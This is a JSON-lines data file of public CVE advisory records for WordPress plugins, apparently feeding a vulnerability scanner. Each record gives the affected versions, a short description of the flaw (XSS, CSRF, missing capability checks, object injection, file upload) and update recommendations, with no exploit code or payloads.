{"CVE_ID":"CVE-2023-0496","slug":"ht-event","versionEndExcluding":"1.4.6","description":"The HT Event WordPress plugin before 1.4.6 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/451b47d5-7bd2-4a82-9c8e-fe6601bcd2ab\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/451b47d5-7bd2-4a82-9c8e-fe6601bcd2ab\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6579","slug":"vc-addons-by-bit14","versionImpact":"1.4.5","versionEndExcluding":"1.4.6","description":"The Web and WooCommerce Addons for WPBakery Builder plugin for WordPress is vulnerable to unauthorized plugin settings modification due to a missing capability check on several plugin functions in all versions up to, and including, 1.4.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change some of the plugin settings.","recommendation":"Update to version 1.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/746b77c9-64f8-43e8-9c2a-ce6bc35fd24c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/746b77c9-64f8-43e8-9c2a-ce6bc35fd24c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vc-addons-by-bit14\\\/tags\\\/1.4.5\\\/bit14-vc-addons.php#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vc-addons-by-bit14\\\/tags\\\/1.4.5\\\/bit14-vc-addons.php#L102\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vc-addons-by-bit14\\\/tags\\\/1.4.5\\\/bit14-vc-addons.php#L114\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vc-addons-by-bit14\\\/tags\\\/1.4.5\\\/bit14-vc-addons.php#L114\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vc-addons-by-bit14\\\/tags\\\/1.4.5\\\/bit14-vc-addons.php#L125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vc-addons-by-bit14\\\/tags\\\/1.4.5\\\/bit14-vc-addons.php#L125\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13737","slug":"motors-car-dealership-classified-listings","versionImpact":"1.4.57","versionEndExcluding":"1.4.58","description":"The Motors \u2013 Car Dealer, Classifieds & Listing plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability checks on the motors_create_template and motors_delete_template functions in all versions up to, and including, 1.4.57. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts or create listing templates. This issue requires Elementor plugin to be installed, which is a required plugin for Motors Starter Theme.","recommendation":"Update to version 1.4.58, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/motors-car-dealership-classified-listings\\\/tags\\\/1.4.52\\\/includes\\\/class\\\/Features\\\/Elementor\\\/Nuxy\\\/TemplateManager.php#L149\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/motors-car-dealership-classified-listings\\\/tags\\\/1.4.52\\\/includes\\\/class\\\/Features\\\/Elementor\\\/Nuxy\\\/TemplateManager.php#L149\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/motors-car-dealership-classified-listings\\\/tags\\\/1.4.52\\\/includes\\\/class\\\/Features\\\/Elementor\\\/Nuxy\\\/TemplateManager.php#L191\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/motors-car-dealership-classified-listings\\\/tags\\\/1.4.52\\\/includes\\\/class\\\/Features\\\/Elementor\\\/Nuxy\\\/TemplateManager.php#L191\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250931\\\/motors-car-dealership-classified-listings\\\/trunk\\\/includes\\\/class\\\/Features\\\/Elementor\\\/Nuxy\\\/TemplateManager.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250931\\\/motors-car-dealership-classified-listings\\\/trunk\\\/includes\\\/class\\\/Features\\\/Elementor\\\/Nuxy\\\/TemplateManager.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04fd2d7a-fa75-4b9d-9514-5c24ca5ebc22?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04fd2d7a-fa75-4b9d-9514-5c24ca5ebc22?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10316","slug":"stratum","versionImpact":"1.4.4","versionEndExcluding":"1.4.5","description":"The Stratum \u2013 Elementor Widgets plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.4 in includes\/templates\/content-switcher.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"Update to version 1.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189021\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189021\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a1cf60b-47bd-4e67-8fe4-6cf46809f2b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a1cf60b-47bd-4e67-8fe4-6cf46809f2b2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8622","slug":"amcharts-charts-and-maps","versionImpact":"1.4.4","versionEndExcluding":"1.4.5","description":"The amCharts: Charts and Maps plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'amcharts_javascript' parameter in all versions up to, and including, 1.4.4 due to the ability to supply arbitrary JavaScript a lack of nonce validation on the preview functionality. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e3593e8-3840-4db0-8269-61bbcb50d569?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e3593e8-3840-4db0-8269-61bbcb50d569?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amcharts-charts-and-maps\\\/tags\\\/1.4.4\\\/includes\\\/preview.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amcharts-charts-and-maps\\\/tags\\\/1.4.4\\\/includes\\\/preview.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3150041\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3150041\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12071","slug":"evergreen-content-poster","versionImpact":"1.4.4","versionEndExcluding":"1.4.5","description":"The Evergreen Content Poster \u2013 Auto Post and Schedule Your Best Content to Social Media plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the delete_network_post() function in all versions up to, and including, 1.4.4. This makes it possible for unauthenticated attackers to delete arbitrary posts and pages.","recommendation":"Update to version 1.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/evergreen-content-poster\\\/trunk\\\/admin\\\/class-evergreen_content_poster-admin.php#L333\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/evergreen-content-poster\\\/trunk\\\/admin\\\/class-evergreen_content_poster-admin.php#L333\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/evergreen-content-poster\\\/trunk\\\/includes\\\/class-evergreen_content_poster.php#L345\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/evergreen-content-poster\\\/trunk\\\/includes\\\/class-evergreen_content_poster.php#L345\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3224190%40evergreen-content-poster&new=3224190%40evergreen-content-poster&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3224190%40evergreen-content-poster&new=3224190%40evergreen-content-poster&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa07f48f-370f-4985-a6fc-a94ed5c59ed4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa07f48f-370f-4985-a6fc-a94ed5c59ed4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4659","slug":"cf7-salesforce","versionImpact":"1.4.4","versionEndExcluding":"1.4.5","description":"The Integration for Salesforce and Contact Form 7, WPForms, Elementor, Formidable, Ninja Forms plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.4.4. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 1.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3299864\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3299864\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a99456c4-c828-4dc9-9375-8981eafbeb15?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a99456c4-c828-4dc9-9375-8981eafbeb15?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10787","slug":"lastudio-element-kit","versionImpact":"1.4.4","versionEndExcluding":"1.4.5","description":"The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.4.4 via the 'elementor-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private and draft posts created by Elementor that they should not have access to.","recommendation":"Update to version 1.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3198563%40lastudio-element-kit&new=3198563%40lastudio-element-kit&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3198563%40lastudio-element-kit&new=3198563%40lastudio-element-kit&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e63c0fb-7fe7-42f7-8fa9-ec159d3c8117?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e63c0fb-7fe7-42f7-8fa9-ec159d3c8117?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6933","slug":"better-search-replace","versionImpact":"1.4.4","versionEndExcluding":"1.4.5","description":"The Better Search Replace plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.4.4 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/895f2db1-a2ed-4a17-a4f6-cd13ee8f84af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/895f2db1-a2ed-4a17-a4f6-cd13ee8f84af?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/better-search-replace\\\/trunk\\\/includes\\\/class-bsr-db.php#L334\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/better-search-replace\\\/trunk\\\/includes\\\/class-bsr-db.php#L334\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3023674\\\/better-search-replace\\\/trunk\\\/includes\\\/class-bsr-db.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3023674\\\/better-search-replace\\\/trunk\\\/includes\\\/class-bsr-db.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5738","slug":"wp-migration-duplicator","versionImpact":"1.4.4","versionEndExcluding":"1.4.5","description":"The WordPress Backup & Migration WordPress plugin before 1.4.4 does not sanitise and escape some parameters, which could allow users with a role as low as Subscriber to perform Cross-Site Scripting attacks.","recommendation":"Update to version 1.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f935916-9a1a-40c7-b6d8-efcc46eb8eaf\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f935916-9a1a-40c7-b6d8-efcc46eb8eaf\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0539","slug":"gs-instagram-portfolio","versionEndExcluding":"1.4.5","description":"The GS Insever Portfolio WordPress plugin before 1.4.5 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a4b6a83a-6394-4dfc-8bb3-4982867dab7d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a4b6a83a-6394-4dfc-8bb3-4982867dab7d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13728","slug":"easy-paypal-donation","versionImpact":"1.4.4","versionEndExcluding":"1.4.5","description":"The Accept Donations with PayPal & Stripe plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the rf parameter in all versions up to, and including, 1.4.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-paypal-donation\\\/tags\\\/1.4.4\\\/core\\\/Base\\\/Stripe.php#L227\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-paypal-donation\\\/tags\\\/1.4.4\\\/core\\\/Base\\\/Stripe.php#L227\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3891a807-aace-460a-ad49-6a282af16084?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3891a807-aace-460a-ad49-6a282af16084?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10970","slug":"motors-car-dealership-classified-listings","versionImpact":"1.4.43","versionEndExcluding":"1.4.44","description":"The The Motors \u2013 Car Dealer, Classifieds & Listing plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.4.43. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.","recommendation":"Update to version 1.4.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/motors-car-dealership-classified-listings\\\/tags\\\/1.4.42\\\/includes\\\/functions.php#L939\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/motors-car-dealership-classified-listings\\\/tags\\\/1.4.42\\\/includes\\\/functions.php#L939\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc58c679-3e87-4bcc-b1bc-718ae52c291a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc58c679-3e87-4bcc-b1bc-718ae52c291a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11360","slug":"page-parts","versionImpact":"1.4.3","versionEndExcluding":"1.4.4","description":"The Page Parts plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.4.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/getting-started.php#L36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/getting-started.php#L36\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/getting-started.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/getting-started.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/getting-started.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/getting-started.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/getting-started.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/getting-started.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/getting-started.php#L65\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/getting-started.php#L65\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/getting-started.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/getting-started.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/index.php#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/index.php#L44\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72f3416a-4d5e-4b95-8f83-7b9440f9e9df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72f3416a-4d5e-4b95-8f83-7b9440f9e9df?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5798","slug":"assistant","versionEndExcluding":"1.4.4","description":"The Assistant WordPress plugin before 1.4.4 does not validate a parameter before making a request to it via wp_remote_get(), which could allow users with a role as low as Editor to perform SSRF attacks","recommendation":"Update to version 1.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bbb4c98c-4dd7-421e-9666-98f15acde761\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bbb4c98c-4dd7-421e-9666-98f15acde761\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3514","slug":"sureforms","versionImpact":"1.4.3","versionEndExcluding":"1.4.4","description":"The SureForms  WordPress plugin before 1.4.4 does not sanitise and escape some of its Form settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fc3da503-a973-44d8-82d0-13539501f8c0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fc3da503-a973-44d8-82d0-13539501f8c0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3513","slug":"sureforms","versionImpact":"1.4.3","versionEndExcluding":"1.4.4","description":"The SureForms  WordPress plugin before 1.4.4 does not sanitise and escape some of its Form settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dd7e0bb3-4a98-4f62-bd2e-f30b27d71226\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dd7e0bb3-4a98-4f62-bd2e-f30b27d71226\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5811","slug":"simple-media-directory","versionImpact":"1.4.3","versionEndExcluding":"1.4.4","description":"The Simple Video Directory WordPress plugin before 1.4.4 does not sanitise and escape some of its settings, which could allow contributors and higher to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf6c2e28-51ef-443b-b1c2-d555c7e12f7f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf6c2e28-51ef-443b-b1c2-d555c7e12f7f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11396","slug":"event-monster","versionImpact":"1.4.3","versionEndExcluding":"1.4.4","description":"The Event Monster \u2013 Event Management, Tickets Booking, Upcoming Event plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.4.3 via the Visitors List Export file. During the export, a CSV file is created in the wp-content folder with a hardcoded filename that is publicly accessible. This makes it possible for unauthenticated attackers to extract data about event visitors, that includes first and last names, email, and phone number.","recommendation":"Update to version 1.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-monster\\\/tags\\\/1.4.3\\\/em-ajax-prossesing\\\/em-visitor-ajax.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-monster\\\/tags\\\/1.4.3\\\/em-ajax-prossesing\\\/em-visitor-ajax.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f522dfe-f2c2-4adb-980c-1f03d3c26e12?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f522dfe-f2c2-4adb-980c-1f03d3c26e12?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5322","slug":"vikrentcar","versionImpact":"1.4.3","versionEndExcluding":"1.4.4","description":"The VikRentCar Car Rental Management System plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the do_updatecar and createcar functions in all versions up to, and including, 1.4.3. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server, which may make remote code execution possible.","recommendation":"Update to version 1.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vikrentcar\\\/tags\\\/1.4.3\\\/admin\\\/controller.php#L1418\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vikrentcar\\\/tags\\\/1.4.3\\\/admin\\\/controller.php#L1418\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vikrentcar\\\/tags\\\/1.4.3\\\/admin\\\/controller.php#L1698\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vikrentcar\\\/tags\\\/1.4.3\\\/admin\\\/controller.php#L1698\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3317493\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3317493\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f837ba2-64a2-4d8e-8212-b646cb94b0d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f837ba2-64a2-4d8e-8212-b646cb94b0d7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7384","slug":"contact-form-entries","versionImpact":"1.4.3","versionEndExcluding":"1.4.4","description":"The Database for Contact Form 7, WPforms, Elementor forms plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.4.3 via deserialization of untrusted input in the get_lead_detail function. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain in the Contact Form 7 plugin, which is likely to be used alongside, allows attackers to delete arbitrary files, leading to a denial of service or remote code execution when the wp-config.php file is deleted.","recommendation":"Update to version 1.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-entries\\\/tags\\\/1.4.1\\\/includes\\\/data.php#L525\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-entries\\\/tags\\\/1.4.1\\\/includes\\\/data.php#L525\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3338764\\\/#file9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3338764\\\/#file9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/129f810d-ff83-4428-9f98-6a6aa8817783?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/129f810d-ff83-4428-9f98-6a6aa8817783?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5906","slug":"job-manager-career","versionImpact":"1.4.3","versionEndExcluding":"1.4.4","description":"The Job Manager & Career WordPress plugin before 1.4.4 contains a vulnerability in the Directory Listings system, which allows an unauthorized user to view and download private files of other users. This vulnerability poses a serious security threat because it allows an attacker to gain access to confidential data and files of other users without their permission.","recommendation":"Update to version 1.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/911d495c-3867-4259-a73a-572cd4fccdde\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/911d495c-3867-4259-a73a-572cd4fccdde\",\"refsource\":\"\",\"tags\":[]}]"}
